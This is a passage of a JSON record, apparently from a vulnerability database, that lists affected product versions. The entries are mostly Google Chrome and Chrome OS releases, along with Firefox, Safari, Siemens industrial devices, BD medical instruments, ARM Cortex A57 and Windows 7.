        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.6"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.337.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.54"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1032"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1302.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.118"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.0"
      },
      {
        "_id": null,
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.945.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.151"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.107"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1666.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.895.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.355.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.6"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.137"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.21"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.308.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.0.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.44"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.234"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.21"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.104"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.0"
      },
      {
        "_id": null,
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.650.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.338.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.451.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.135"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.114"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.59"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3"
      },
      {
        "_id": null,
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.0"
      },
      {
        "_id": null,
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "_id": null,
        "model": "pyxis cubie replenishment station",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.427.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.5"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1024"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.276.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.0"
      },
      {
        "_id": null,
        "model": "cortex a57",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arm",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.574.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.320.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.72"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.946.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.888.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.5"
      },
      {
        "_id": null,
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.224.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1678.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.33"
      },
      {
        "_id": null,
        "model": "ruggedcom ape",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.704.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.149"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.60"
      },
      {
        "_id": null,
        "model": "bactec fx40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1035"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1291.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.59"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "_id": null,
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.57"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.632.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.158"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.154"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.328"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.5"
      },
      {
        "_id": null,
        "model": "simatic et 200sp open controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.899.0"
      },
      {
        "_id": null,
        "model": "windows for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1029"
      },
      {
        "_id": null,
        "model": "chrome os",
